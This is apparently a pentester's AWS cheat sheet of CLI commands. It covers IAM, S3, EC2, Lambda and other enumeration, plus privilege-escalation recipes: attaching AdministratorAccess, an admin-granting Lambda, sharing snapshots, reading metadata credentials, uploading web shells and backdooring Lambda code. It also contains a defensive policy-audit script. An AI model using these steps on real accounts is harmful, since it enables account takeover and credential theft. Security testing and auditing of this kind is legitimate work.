# AWS

## 00. Basic

* Configure AWS creds

```bash
## ------------------| Configure 
aws configure
# AWS Access Key ID [None]: AKIAIOSFODNN7EXAMPLE
# AWS Secret Access Key [None]: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
# Default region name [None]: us-west-2
# Default output format [None]:

## ------------------| Export as env
export AWS_PROFILE=ProfileName
export AWS_REGION=<AWS_REGION>
export AWS_ACCESS_KEY_ID=<ACCESS_KEY>
export AWS_SECRET_ACCESS_KEY=<SECRET_KEY>
export AWS_SESSION_TOKEN=<SESSION_TOKEN>

## ------------------| Use as file
aws configure import --csv file://credentials.csv

## ------------------| Set as .aws
### ~/.aws/credentials
[<ProfileName>]
aws_access_key_id = <ACCESS_KEY>
aws_secret_access_key = <SECRET_KEY>
aws_session_token = <SESSION_TOKEN>
### ~/.aws/config
[profile <ProfileName>]
region = <AWS_REGION>

## ------------------| List details
aws sts get-caller-identity
```

* Credentials

```bash
## ------------------| If the AccessKeyId starts with
AKI <-- Long-term credentials
ASI <-- Short-term credentials
```

* [Amazon Resource Names (ARNs)](https://docs.aws.amazon.com/general/latest/gr/aws-arns-and-namespaces.html)

```bash
## ------------------| Format
arn:partition:service:region:account-id:resource-id
arn:partition:service:region:account-id:resource-type/resource-id
arn:partition:service:region:account-id:resource-type:resource-id
                                ^ 12 digit number                               
                                
## ------------------| [partition]
aws        AWS Regions
aws-cn     China Regions
aws-us-gov AWS GovCloud (US) Regions

## ------------------| [service]
s3,lambda,ec2,iam

## ------------------| [region]
us-east-1,.. 
## If the region is empty, the resource is global
arn:partition:service::account-id:resource-id
```

* [Attack path I](https://youtu.be/B_-8TT23a6E)

```bash
## ------------------| List down all RDS databases
aws rds describe-db-instances --output=table --color on --query 'DBInstances[].[DBInstanceIdentifier,MasterUsername,DBSubnetGroup.VpcId,Endpoint.Address]'

## ------------------| List down all subnets
aws rds describe-db-instances --output=table --color on --query 'DBInstances[].DBSubnetGroup.Subnets[].SubnetIdentifier'

## ------------------| Examine selected database subnets
aws rds describe-db-instances --output=table --color on --filters "Name=db-instance-id,Values=<DBName>" --query 'DBInstances[].DBSubnetGroup.Subnets[].SubnetIdentifier'

## ------------------| List down all NACLs
aws ec2 describe-network-acls --output=table --color on --query 'NetworkAcls[].Entries'
## |0.0.0.0/0| True | -1 | allow | 100 | << Open for all

## ------------------| For selected subnets: what traffic do network access control lists (NACLs) allow?
aws ec2 describe-network-acls --output=table --color on --filters "Name=association.subnet-id,Values=subnet-0a7f04b97a6ed9b11" --query 'NetworkAcls[].Entries'

## ------------------| What traffic do DB security groups allow?
aws ec2 describe-security-groups --output=table --color on
aws ec2 describe-security-groups --output=table --color on --filters "Name=group-id,Values=sg-0a7f04b97a6ed9b11" | less

## ------------------| Find VPC with access to database
aws ec2 describe-vpcs --output=table --color on
aws ec2 describe-vpcs --output=table --color on --filters "Name=cidrBlock,Values=172.31.0.0/16"
aws ec2 describe-vpcs --output=table --color on --filters "Name=cidrBlock,Values=172.31.0.0/16" --query 'Vpcs[].VpcId'

## ------------------| VPC security group [port 3306 egress]
aws ec2 describe-security-groups --output=table --color on --filters "Name=ip-permission.to-port,Values=3306"
aws ec2 describe-security-groups --output=table --color on --filters "Name=egress.ip-permission.cidr,Values='0.0.0.0/0'" "Name=ip-permission.to-port,Values=22" --query 'SecurityGroups[].GroupId'

## ------------------| Check Lambda functions
aws lambda list-functions --output=table --color on
aws lambda list-functions --output=table --color on --query 'Functions[?VpcConfig.SecurityGroupIds==[`sg-07d51f986796059f9`]].FunctionName'

## ------------------| Query to download Lambda source code
aws lambda get-function --function-name <FunctionName> --query Code.Location

## ------------------| List all EC2 instances that have a public IP (look for instances that can exfil)
aws ec2 describe-instances --output text --query 'Reservations[].Instances[].NetworkInterfaces[].Association.[PublicIp,PublicDnsName]'

## ------------------| Find security groups with no outbound restrictions
aws ec2 describe-security-groups --color on --output table --filters "Name=egress.ip-permission.cidr,Values='0.0.0.0/0'" --query 'SecurityGroups[].GroupId'
aws ec2 describe-security-groups --color on --output table --filters "Name=egress.ip-permission.cidr,Values='0.0.0.0/0'" "Name=vpc-id,Values=<VPCId>" --query 'SecurityGroups[].GroupId'
```

## 01. IAM (Identity and Access Management)

### 01.0 Users

```bash
## ------------------| List all users
aws iam list-users 
aws iam list-users --output table --query Users[].[UserName,Arn,UserId]

## ------------------| Enumerate groups for users
aws iam list-groups-for-user --user-name <UserName>
for i in $(aws iam list-users --query 'Users[].UserName' --output text); do aws iam list-groups-for-user --user-name "$i"; done

## ------------------| List all inline policies
aws iam list-user-policies --user-name <UserName>

## ------------------| Lists all managed policies
aws iam list-attached-user-policies --user-name <UserName>

## ------------------| Enumerate user's signing certificates
aws iam list-signing-certificates --user-name <UserName>
for i in $(aws iam list-users --query 'Users[].UserName' --output text); do echo "[$i]"; aws iam list-signing-certificates --user-name "$i" --output json; done

## ------------------| Check for public ssh keys for user.
aws iam get-ssh-public-key --user-name <UserName> --encoding <PEM/SSH> --ssh-public-key-id <SSHPublicKeyId>

## ------------------| Check for Multi Factor Auth for user
aws iam list-virtual-mfa-devices
aws iam list-mfa-devices --user-name <UserName>
for i in $(aws iam list-users --query Users[].UserName --output text);do echo "[$i]";aws iam list-mfa-devices --user-name $i --output json;done   

## ------------------| Check if the user has a console login profile
aws iam get-login-profile --user-name <UserName>
for i in $(aws iam list-users --query Users[].UserName --output text);do echo "[$i]";aws iam get-login-profile --user-name $i;done

## ------------------| Create another access key
aws iam create-access-key --user-name <UserName>
```

### 01.2 Groups

```bash
## ------------------| List all groups
aws iam list-groups --output json

## ------------------| List all inline policies
aws iam list-group-policies --group-name <GroupName>

## ------------------| Lists all managed policies
aws iam list-attached-group-policies --group-name <GroupName>

```

### 01.3 Roles

```bash
## ------------------| List all roles
aws iam list-roles --output json

## ------------------| List role information
aws iam get-role --role-name <RoleName> --output json

## ------------------| Lists all attached policies
## arn:aws:sts::<account-id>:.../<RoleName>/...
aws iam list-attached-role-policies --role-name <RoleName>

## ------------------| List all inline policies.
aws iam list-role-policies --role-name <RoleName>

## ------------------| Assuming the role
aws sts assume-role --role-arn arn:aws:iam::<AccountID>:role/<RoleName> --role-session-name AnyName
```

### 01.4 Policies

```bash
## ------------------| List all policies
aws iam list-policies --output json
aws iam list-policies --output json --scope Local
aws iam list-policies --output json | grep Admin
aws iam list-policies --output json --query Policies[].[PolicyName,PolicyId,Arn,DefaultVersionId]

## ------------------| List all inline policies
aws iam list-user-policies --user-name <UserName>
for i in $(aws iam list-users --query Users[].UserName --output text);do aws iam list-user-policies --user-name $i;done

## ------------------| List all managed policies
aws iam list-attached-user-policies --user-name <UserName>
for i in $(aws iam list-users --query 'Users[].UserName' --output text); do printf '[%s]\t' "$i"; aws iam list-attached-user-policies --user-name "$i" --output text | awk '{print $2"\t"$3}'; done

## ------------------| Check policy permissions / Find the DefaultVersionId
aws iam get-policy --policy-arn arn:aws:iam::<AccountID>:policy/<PolicyName>

## ------------------| Read the policy document
aws iam get-policy-version --output json --policy-arn arn:aws:iam::<AccountID>:policy/<PolicyName> --version-id <DefaultVersionId>

## ------------------| List details about inline policy document
aws iam get-user-policy --user-name <UserName> --policy-name <PolicyName>
aws iam get-group-policy --group-name <GroupName> --policy-name <PolicyName>
aws iam get-role-policy --role-name <RoleName> --policy-name <PolicyName>

## ------------------| [If user has PutUserPolicy] Add an inline policy document that is embedded in the specified IAM user
aws iam put-user-policy --user-name <UserName> --policy-name <PolicyName> --policy-document file://Policy.json

## ------------------| Policy.json
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": [
                "*"
            ],
            "Resource": [
                "*"
            ]
        }
    ]
}
```

### 01.5 [Privilege Escalation](https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation)

<table><thead><tr><th width="290">Required Permission</th><th>Privilege Escalation Method</th></tr></thead><tbody>
<tr><td>iam:AttachUserPolicy</td><td>Attaching a policy to a user</td></tr>
<tr><td>iam:AttachGroupPolicy</td><td>Attaching a policy to a group</td></tr>
<tr><td>iam:AttachRolePolicy</td><td>Attaching a policy to a role</td></tr>
<tr><td>iam:CreateAccessKey</td><td>Creating a new user access key</td></tr>
<tr><td>iam:CreateLoginProfile</td><td>Creating a new login profile</td></tr>
<tr><td>iam:UpdateLoginProfile</td><td>Updating an existing login profile</td></tr>
<tr><td><p>iam:PassRole</p><p>ec2:RunInstances</p></td><td>Creating an EC2 instance with an existing instance profile</td></tr>
<tr><td>iam:PutUserPolicy</td><td>Creating/updating an inline policy for a user</td></tr>
<tr><td>iam:PutGroupPolicy</td><td>Creating/updating an inline policy for a group</td></tr>
<tr><td>iam:PutRolePolicy</td><td>Creating/updating an inline policy for a role</td></tr>
<tr><td>iam:AddUserToGroup</td><td>Adding a user to a group</td></tr>
<tr><td><p>iam:UpdateAssumeRolePolicy</p><p>sts:AssumeRole</p></td><td>Updating the AssumeRolePolicyDocument of a role</td></tr>
<tr><td><p>iam:PassRole</p><p>lambda:CreateFunction</p><p>lambda:InvokeFunction</p></td><td>Passing a role to a new Lambda function, then invoking it</td></tr>
<tr><td>lambda:UpdateFunctionCode</td><td>Updating the code of an existing Lambda function</td></tr>
</tbody></table>

#### 01.5.1 Overly Permissive Permission

* <mark style="color:green;">iam:AttachUserPolicy</mark>

```bash
## ------------------| Check if you have "Action": "iam:AttachUserPolicy"
aws iam get-policy-version --policy-arn arn:aws:iam::<AccountID>:policy/<PolicyName> --version-id <DefaultVersionId>

## ------------------| Find ARN for AdministratorAccess policy
aws iam list-policies | grep "AdministratorAccess"

## ------------------| Attach policy for a user
aws iam attach-user-policy --user-name <UserName> --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

## ------------------| Checking attached policies again
aws iam list-attached-user-policies --user-name <UserName>
```

* <mark style="color:green;">iam:CreateLoginProfile</mark>

```bash
## ------------------| Check if you have "Action": "iam:CreateLoginProfile"
aws iam get-user-policy --user-name <UserName> --policy-name <PolicyName>

## ------------------| List all users
aws iam list-users --output table --query Users[].[UserName,Arn,UserId]

## ------------------| View existing policies
aws iam list-attached-user-policies --user-name <UserName>

## ------------------| Creating login profile
aws iam create-login-profile --user-name <UserName> --password Passw0rd@123 --no-password-reset-required         
```

* <mark style="color:green;">sts:AssumeRole</mark>

```bash
## ------------------| Check if you have sts:AssumeRole
aws sts assume-role --role-arn <RoleArn> --role-session-name <SessionName> --profile <ProfileName>           
### Extract the token to .aws

## ------------------| List all ebs snapshots
aws ec2 describe-snapshots --owner-ids <Victim_Account> --region <Region> --profile <ProfileName>

## ------------------| Exploit
aws ec2 modify-snapshot-attribute --snapshot-id <SnapId> --attribute createVolumePermission --operation-type add --user-ids <Victim_Account> --region <Region> --profile <ProfileName>
aws ec2 create-volume --snapshot-id <SnapId> --availability-zone <AvailabilityZone> --region <Region> --profile <ProfileName>
aws ec2 attach-volume --device /dev/xvhd --instance-id <InstanceID> --volume-id <VolumeId> --region <Region> --profile <ProfileName>
```

* <mark style="color:green;">iam:PassRole with lambda:CreateFunction</mark>

```bash
## ------------------| Check if we have rights to go ahead
aws iam list-user-policies --user-name <CurrentUserName>
aws iam get-user-policy --user-name <CurrentUserName> --policy-name <PolicyName>

## ------------------| Finding lambda role details
aws iam list-roles --output json
aws iam list-roles --output json --query "Roles[].[RoleName,AssumeRolePolicyDocument.Statement[].Principal.Service]" | grep -B2 "lambda.amazonaws.com"

## ------------------| Check policy details for lambda role for iam:AttachUserPolicy
aws iam get-role --role-name <RoleName> --output json
aws iam list-role-policies --role-name <RoleName> --output json
aws iam get-role-policy --role-name <RoleName> --policy-name <PolicyName> --output json

## ------------------| Creating lambda function (evil.py)
import boto3

def h4rithd(event, context):
    iam = boto3.client("iam")
    response = iam.attach_user_policy(
        UserName="<UserName>",PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
    )
    return response
    
## ------------------| Upload lambda function
zip evil-function.zip evil.py
aws lambda create-function --function-name evil-function --runtime python3.8 --zip-file fileb://evil-function.zip --handler evil.h4rithd --role arn:aws:iam::<account-id>:role/lamdaFunction

## ------------------| Execute/Invoking the lambda function
aws lambda invoke --function-name evil-function results.txt
```

* <mark style="color:green;">iam:PassRole with ec2:RunInstances</mark>

```bash
## ------------------| List policies and check if we have access
aws iam list-attached-user-policies --user-name <UserName>
aws iam list-user-policies --user-name <UserName>
aws iam get-user-policy --user-name <UserName> --policy-name <PolicyName>

## ------------------| List ec2 roles and get role name
aws iam list-roles --output json --query "Roles[].[RoleName,AssumeRolePolicyDocument.Statement[].Principal.Service]" | grep -B2 "ec2.amazonaws.com"

## ------------------| Listing policy details attached to role
aws iam list-role-policies --role-name <RoleName>
aws iam get-role-policy --role-name <RoleName> --policy-name <PolicyName>

## ------------------| Find AMI id
aws ec2 describe-images --owners amazon --filters 'Name=name,Values=amzn-ami-hvm-*' 'Name=state,Values=available' --output json | jq -r '.Images | sort_by(.CreationDate) | last(.[]).ImageId'

## ------------------| Find subnet id
aws ec2 describe-subnets

## ------------------| List security groups
aws ec2 describe-security-groups

## ------------------| List instance profile name
aws iam list-instance-profiles

## ------------------| Start ec2 instance
aws ec2 run-instances --subnet-id <SubnetID> --image-id <AMIID> --iam-instance-profile Name=<ProfileName> --instance-type t2.micro --security-group-ids "<SecurityGroupId>"

## ------------------| If you have SSM *
aws ssm send-command --document-name "AWS-RunShellScript" --parameters 'commands=["curl -sS http://169.254.169.254/latest/meta-data/iam/security-credentials"]' --targets "Key=instanceids,Values=<InstanceID>" --comment "This is comment"
## Copy the CommandID

## ------------------| Check the command's output
aws ssm get-command-invocation --command-id "<CommandID>" --instance-id "<InstanceID>"
```

#### 01.5.2 Dangerous policy combinations

```bash
## ------------------| List policies
aws iam list-attached-user-policies --user-name <UserName>
aws iam list-user-policies --user-name <UserName>
aws iam get-user-policy --user-name <UserName> --policy-name <PolicyName>
```
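
An added example, not part of the original cheat sheet: a defender-side audit that takes the policy documents returned by the `get-policy-version` / `get-user-policy` commands above and reports which methods from the 01.5 table their combined Allow statements enable. The function names and sample policies are constructed for illustration; conditions, resource scoping, explicit Deny, permission boundaries and SCPs are not evaluated, so each hit is a candidate for review.

```python
import re

# Permission sets taken from the table in 01.5: a principal holding every
# action in a set can use the corresponding method.
PRIVESC_METHODS = {
    "Attaching a policy to a user": {"iam:AttachUserPolicy"},
    "Attaching a policy to a group": {"iam:AttachGroupPolicy"},
    "Attaching a policy to a role": {"iam:AttachRolePolicy"},
    "Creating a new user access key": {"iam:CreateAccessKey"},
    "Creating a new login profile": {"iam:CreateLoginProfile"},
    "Updating an existing login profile": {"iam:UpdateLoginProfile"},
    "Creating an EC2 instance with an existing instance profile":
        {"iam:PassRole", "ec2:RunInstances"},
    "Creating/updating an inline policy for a user": {"iam:PutUserPolicy"},
    "Creating/updating an inline policy for a group": {"iam:PutGroupPolicy"},
    "Creating/updating an inline policy for a role": {"iam:PutRolePolicy"},
    "Adding a user to a group": {"iam:AddUserToGroup"},
    "Updating the AssumeRolePolicyDocument of a role":
        {"iam:UpdateAssumeRolePolicy", "sts:AssumeRole"},
    "Passing a role to a new Lambda function, then invoking it":
        {"iam:PassRole", "lambda:CreateFunction", "lambda:InvokeFunction"},
    "Updating the code of an existing Lambda function":
        {"lambda:UpdateFunctionCode"},
}


def as_list(value):
    """IAM accepts a single string/object wherever a list is expected."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def matches(pattern, action):
    """IAM action matching: case-insensitive, '*' = any run, '?' = one char."""
    regex = re.escape(pattern).replace(r"\*", ".*").replace(r"\?", ".")
    return re.fullmatch(regex, action, re.IGNORECASE) is not None


def is_allowed(action, policies):
    """True if any Allow statement in any policy document grants `action`."""
    for policy in policies:
        for stmt in as_list(policy.get("Statement")):
            if stmt.get("Effect") != "Allow":
                continue  # explicit Deny is not evaluated (see lead-in)
            if "Action" in stmt:
                if any(matches(p, action) for p in as_list(stmt["Action"])):
                    return True
            elif "NotAction" in stmt:
                # Allow + NotAction grants everything except the listed actions.
                if not any(matches(p, action) for p in as_list(stmt["NotAction"])):
                    return True
    return False


def find_privesc(policies):
    """Return {method: sorted required actions} for every table row whose
    full permission set is granted by the union of `policies`."""
    return {
        method: sorted(required)
        for method, required in PRIVESC_METHODS.items()
        if all(is_allowed(action, policies) for action in required)
    }


# Constructed sample policy documents (not taken from any real account).
READ_AND_PASS = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": ["iam:Get*", "iam:List*", "IAM:passrole"],
     "Resource": "*"}]}
LAMBDA_FULL = {"Version": "2012-10-17", "Statement":
               {"Effect": "Allow", "Action": "lambda:*", "Resource": "*"}}
NOT_IAM = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "NotAction": "iam:*", "Resource": "*"}]}
ALLOW_ALL = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": ["*"], "Resource": ["*"]}]}

if __name__ == "__main__":
    cases = {
        "READ_AND_PASS alone": [READ_AND_PASS],
        "READ_AND_PASS + LAMBDA_FULL": [READ_AND_PASS, LAMBDA_FULL],
        "NOT_IAM": [NOT_IAM],
        "ALLOW_ALL": [ALLOW_ALL],
    }
    for name, docs in cases.items():
        print(f"[{name}]")
        for method, actions in find_privesc(docs).items():
            print(f"  {', '.join(actions)} -> {method}")
```

The second case shows why policies must be evaluated together: `iam:PassRole` in one document and `lambda:*` in another only become a finding once both are attached to the same principal.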

## 02. S3 (Simple Storage Service)

```bash
## ------------------| List all s3 buckets
aws s3api list-buckets
aws s3 ls s3://

## ------------------| Interact with s3 buckets
aws s3 ls s3://<BucketName>

## ------------------| Get the information about specified bucket acls
aws s3api get-bucket-acl --bucket <BucketName>

## ------------------| Get the information about specified bucket policy 
aws s3api get-bucket-policy --bucket <BucketName>

## ------------------| Retrieves the Public Access Block configuration for an Amazon S3 bucket
aws s3api get-public-access-block --bucket <BucketName>

## ------------------| List of all the objects in specified bucket 
aws s3api list-objects --bucket <BucketName>

## ------------------| Get the acls information about specified object 
aws s3api get-object-acl --bucket <BucketName> --key <ObjectName>

## ------------------| Copy file to bucket
aws s3 cp /tmp/shell.php s3://<BucketName>/shell.php

## ------------------| List all directory
aws --endpoint-url http://s3.bucket.htb s3 ls

## ------------------| List what inside the directory
aws --endpoint-url http://s3.bucket.htb s3 ls 
aws --endpoint-url http://s3.bucket.htb s3 ls <directory>

## ------------------| Upload file/shell
aws --endpoint-url http://s3.bucket.htb s3 cp shell.php s3://<directory>/shell.php

## ------------------| Create a bucket and enable versioning
aws s3 mb s3://aws-<BucketName> --region <Region> --profile <Profile>
aws s3api put-bucket-versioning --bucket <BucketName> --versioning-configuration Status=Enabled --region <Region> --profile <Profile> 
```

## 03. VPC (Virtual Private Cloud)

```bash
## ------------------| Get details
aws ec2 describe-vpcs
aws ec2 describe-vpcs --region <us-east-1/us-west-1>
aws ec2 describe-vpcs --filters "Name=vpc-id,Values=<VpcID>"

## ------------------| List Subnets
aws ec2 describe-subnets
aws ec2 describe-subnets --filters "Name=vpc-id,Values=<VpcID>"

## ------------------| List Route Table
aws ec2 describe-route-tables
aws ec2 describe-route-tables --filters "Name=vpc-id,Values=<VpcID>"

## ------------------| List Network ACLs
aws ec2 describe-network-acls
aws ec2 describe-network-acls --filters "Name=vpc-id,Values=<VpcID>"

## ------------------| List all VPC Peering Connections
aws ec2 describe-vpc-peering-connections

## ------------------| List EC2 instances in the specified VPC
aws ec2 describe-instances --filters "Name=vpc-id,Values=<VpcID>"

## ------------------| List EC2 instances in the specified subnet
aws ec2 describe-instances --filters "Name=subnet-id,Values=<SubnetID>"
```

## 04. EC2 (Elastic Compute Cloud)

```bash
## ------------------| List all Instances 
aws ec2 describe-instances
aws ec2 describe-instances --region <us-east-1/us-west-1>

## ------------------| List  the Information about Specified Instance 
aws ec2 describe-instances --instance-ids <InstanceId>

## ------------------| List the Information about UserData Attribute of the specified Instance
aws ec2 describe-instance-attribute --attribute userData --instance-id <InstanceId>

## ------------------| List the Information about IAM instance profile associations 
aws ec2 describe-iam-instance-profile-associations

## ------------------| Attach an instance profile with a role to a EC2 instance
aws ec2 associate-iam-instance-profile --instance-id <InstanceID> --iam-instance-profile Name=<ProfileName>       

## ------------------| AWS Metadata
### IMDSv1
curl http://169.254.169.254/latest/meta-data/
curl -sS http://169.254.169.254/latest/meta-data/iam/security-credentials
curl -sS http://169.254.169.254/latest/meta-data/iam/security-credentials/<RoleName>
curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance
### IMDSv2
export TOKEN=$(curl -sS -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -sS -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/

## ------------------| AWS Userdata
### IMDSv1
curl http://169.254.169.254/latest/user-data/
### IMDSv2
export TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600") 
curl -sS -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/user-data/
```

## 05. EBS (Elastic Block Store)

```bash
## ------------------| List the Information about EBS volumes 
aws ec2 describe-volumes 

## ------------------| List about all the available EBS snapshots
aws ec2 describe-snapshots
aws ec2 describe-snapshots --owner-ids self

## ------------------| Creates a snapshot of the specified volume 
aws ec2 create-snapshot --volume-id <VolumeID> --description "Backup Snapshot" 

## ------------------| Create a volume from snapshots
aws ec2 create-volume --snapshot-id <SnapshotID> --availability-zone <AvailabilityZone>

## ------------------| Attach specified volume to the ec2-instance
aws ec2 attach-volume --volume-id <VolumeID> --instance-id <InstanceID> --device </dev/sdfd>

## ------------------| Mount Volume on EC2 file system 
sudo mount </dev/sdfd> /mnt/backups
```

## 06. EKS (Elastic Kubernetes Service)

```bash
## ------------------| Describe about all the repositories in the container registry 
aws ecr describe-repositories

## ------------------| Get the information about repository policy 
aws ecr get-repository-policy --repository-name <RepositoryName>

## ------------------| Lists of all images in the specified repository 
aws ecr list-images --repository-name <RepositoryName>

## ------------------| Describe the information about a container image 
aws ecr describe-images --repository-name <RepositoryName> --image-ids imageTag=<ImageTag>

## ------------------| Lists all ECS Clusters 
aws ecs list-clusters

## ------------------| Describe information about specified cluster 
aws ecs describe-clusters --cluster <ClusterName>

## ------------------| Lists all services in the specified cluster
aws ecs list-services --cluster <ClusterName>

## ------------------| Describe the information about a specified service 
aws ecs describe-services --cluster <ClusterName> --services <ServiceName>

## ------------------| Lists all tasks in the specified cluster 
aws ecs list-tasks --cluster <ClusterName>

## ------------------| Describe the information about a specified task 
aws ecs describe-tasks --cluster <ClusterName> --tasks <TaskArn>

## ------------------| Lists all containers in the specified cluster 
aws ecs list-container-instances --cluster <ClusterName>

## ------------------| Lists all EKS Clusters 
aws eks list-clusters

## ------------------| Describe the information about a specified cluster 
aws eks describe-cluster --name <ClusterName>

## ------------------| List of all node groups in a specified cluster
aws eks list-nodegroups --cluster-name <ClusterName>

## ------------------| Describe the information about a specific node group in a cluster 
aws eks describe-nodegroup --cluster-name <ClusterName> --nodegroup-name <NodeGroup>

## ------------------| List of all fargate in a specified cluster 
aws eks list-fargate-profiles --cluster-name <ClusterName>

## ------------------| Describe the information about a specific fargate profile in a cluster 
aws eks describe-fargate-profile --cluster-name <ClusterName> --fargate-profile-name <ProfileName>
```

## 07. RDS (Relational Database Service)

```bash
## ------------------| Describes the Information about the clusters in RDS
aws rds describe-db-clusters 

## ------------------| Describes the Information about the database instances in RDS
aws rds describe-db-instances 

## ------------------| Describes the Information about the subnet groups in RDS
aws rds describe-db-subnet-groups 

## ------------------| Describes the Information about the database security groups in RDS
aws rds describe-db-security-groups 

## ------------------| Describes the Information about the database proxies in RDS
aws rds describe-db-proxies
```

## 08. KMS (Key Management Service)

```bash
## ------------------| List all keys available in Key Management Service (KMS)
aws kms list-keys

## ------------------| Describe the specified key
aws kms describe-key --key-id <KeyID>

## ------------------| List the policies attached to the specified key
aws kms list-key-policies --key-id <KeyID>

## ------------------| Get full information about a policy
aws kms get-key-policy --policy-name <PolicyName> --key-id <KeyID>
```

## 09. Lambda

* Functions

```bash
## ------------------| List all functions
aws lambda list-functions --endpoint-url=http://cloud.epsilon.htb 

## ------------------| Get code 
aws lambda get-function --function-name=<Function_Name> --endpoint-url=http://cloud.epsilon.htb 

## ------------------| Upload the backdoor updated code to aws lambda function 
aws lambda update-function-code --function-name <MyFunction> --zip-file fileb://backdoor.zip

## ------------------| Get details for lambda function 
aws lambda get-function --function-name <FunctionName>

## ------------------| Get details for the policy Information about the specified lambda function 
aws lambda get-policy --function-name <FunctionName>

## ------------------| Get details for the event source mapping Information about the specified lambda function 
aws lambda list-event-source-mappings --function-name <FunctionName>

## ------------------| List of all the layers (dependencies) in aws account 
aws lambda list-layers

## ------------------| Get details for the full Information about the specified layer name
aws lambda get-layer-version --layer-name <LayerName> --version-number <VersionNumber>

## ------------------| Create a lambda function and attach role to this function 
aws lambda create-function --function-name <MyFunction> --runtime <python3.7> --zip-file fileb://file.zip --handler <myfunction.handler> --role <RoleArn> --region <Region>

## ------------------| Invoke the lambda function 
aws lambda invoke --function-name <FunctionName> response.json --region <Region>
```

* API Gateway

```bash
## ------------------| List of all the Rest APIs 
aws apigateway get-rest-apis

## ------------------| Get the information about specified API
aws apigateway get-rest-api --rest-api-id <ApiId>

## ------------------| Lists information about a collection of resources
aws apigateway get-resources --rest-api-id <ApiId>

## ------------------| Get information about the specified resource
aws apigateway get-resource --rest-api-id <ApiId> --resource-id <ResourceID>

## ------------------| Get the method information for the specified resource 
aws apigateway get-method --rest-api-id <ApiId> --resource-id <ResourceID> --http-method <Method>

## ------------------| List of all stages for a REST API 
aws apigateway get-stages --rest-api-id <ApiId>

## ------------------| Get the information about specified API's stage 
aws apigateway get-stage --rest-api-id <ApiId> --stage-name <StageName>

## ------------------| List of all the API keys 
aws apigateway get-api-keys --include-values

## ------------------| Get the information about a specified API key 
aws apigateway get-api-key --api-key <ApiKey>
```

## 10. DynamoDB

```bash
## ------------------| List Tables
aws --endpoint-url http://s3.bucket.htb dynamodb list-tables

## ------------------| Get stuff on the table 
aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name <tableName> | jq .     

## ------------------| Put stuff on the table
aws --endpoint-url http://s3.bucket.htb dynamodb put-item --table-name <tableName> --item file://<filename>.json     

## ------------------| Create table
aws --endpoint-url http://s3.bucket.htb dynamodb create-table \
    --table-name alerts \
    --attribute-definitions AttributeName=title,AttributeType=S \
    --key-schema AttributeName=title,KeyType=HASH \
    --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5
```

## 11. Secrets Manager

```bash
## ------------------| List all secrets stored by Secrets Manager
aws secretsmanager list-secrets

## ------------------| Describe the specified secret
aws secretsmanager describe-secret --secret-id <SecretName>

## ------------------| Get the resource-based policy that is attached to the specified Secret
aws secretsmanager get-resource-policy --secret-id <SecretID>

```

## 12. [pacu](https://github.com/RhinoSecurityLabs/pacu)

* Cross Account Enumerations

```bash
## ------------------| User Enumerations
### Create assume-role.json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "*"
      },
      "Action": "sts:AssumeRole",
      "Condition": {}
    }
  ]
}
### Create the role
aws iam create-role --role-name AnyName --assume-role-policy-document file://$(pwd)/assume-role.json
### Start pacu and set the keys
run iam__enum_users --role-name AnyName --account-id <StolenAccountID>
run iam__enum_users --role-name AnyName --account-id <StolenAccountID> --word-list username.txt

## ------------------| Role Enumerations
run iam__enum_roles --role-name AnyName --account-id <StolenAccountID>
run iam__enum_roles --role-name AnyName --account-id <StolenAccountID> --word-list username.txt
```

## 13. [ScoutSuite](https://github.com/nccgroup/ScoutSuite)

```bash
## ------------------| Install
git clone https://github.com/nccgroup/ScoutSuite && cd ScoutSuite
virtualenv -p python3 venv && source venv/bin/activate
pip install -r requirements.txt
python scout.py --help

## ------------------| Enumerate
python scout.py aws -p <Profile> -r <Region>
```

## 14. [PMapper](https://github.com/nccgroup/PMapper)

```bash
## ------------------| Install
pip install principalmapper

## ------------------| Create a graph for the account, accessed through AWS CLI profile "skywalker"
pmapper --profile skywalker graph create

## ------------------| Run a query to see who can make IAM Users
pmapper --profile skywalker query 'who can do iam:CreateUser'

## ------------------| Run a query to see who can launch a big expensive EC2 instance, aside from "admin" users
pmapper --account 000000000000 argquery -s --action 'ec2:RunInstances' --condition 'ec2:InstanceType=c6gd.16xlarge'

## ------------------| Run the privilege escalation preset query, skip reporting current "admin" users
pmapper --account 000000000000 query -s 'preset privesc *'

## ------------------| Create an SVG representation of the admins/privescs/inter-principal access
pmapper --account 000000000000 visualize --filetype svg
```


